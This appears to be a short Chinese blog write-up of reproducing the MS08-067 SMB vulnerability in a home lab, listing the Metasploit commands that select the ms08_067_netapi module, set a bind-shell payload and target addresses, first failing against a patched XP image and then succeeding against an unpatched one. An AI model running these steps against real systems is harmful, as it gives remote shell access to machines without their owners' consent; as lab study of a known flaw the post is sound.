MS08-067 复现

目标靶机:windows xp professional sp3:192.168.0.126
用到的端口:445、3389
攻击机:kali:192.168.0.121

确定目标靶机端口开启:
file
靶机和攻击机之间ping
file

打开msf

msfconsole

file
查找攻击模块

search ms08-067

file
调用模块

use exploit/windows/smb/ms08_067_netapi

file
调用载荷

show payloads

file

配置

set payload generic/shell_bind_tcp
set lhost 192.168.0.121
set rhost 192.168.0.126
set lport 4444
set rport 445

查看配置

show options

file

exploit

file
回显:Exploit completed, but no session was created.
在我设session 1 之后就彻底把我拦截了
应该是这个镜像打了漏洞补丁
file

更换了英文版的XP,445默认开启的,防火墙关闭
file

这次目标ip改为192.168.0.108,其它操作同上

file
攻击成功

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据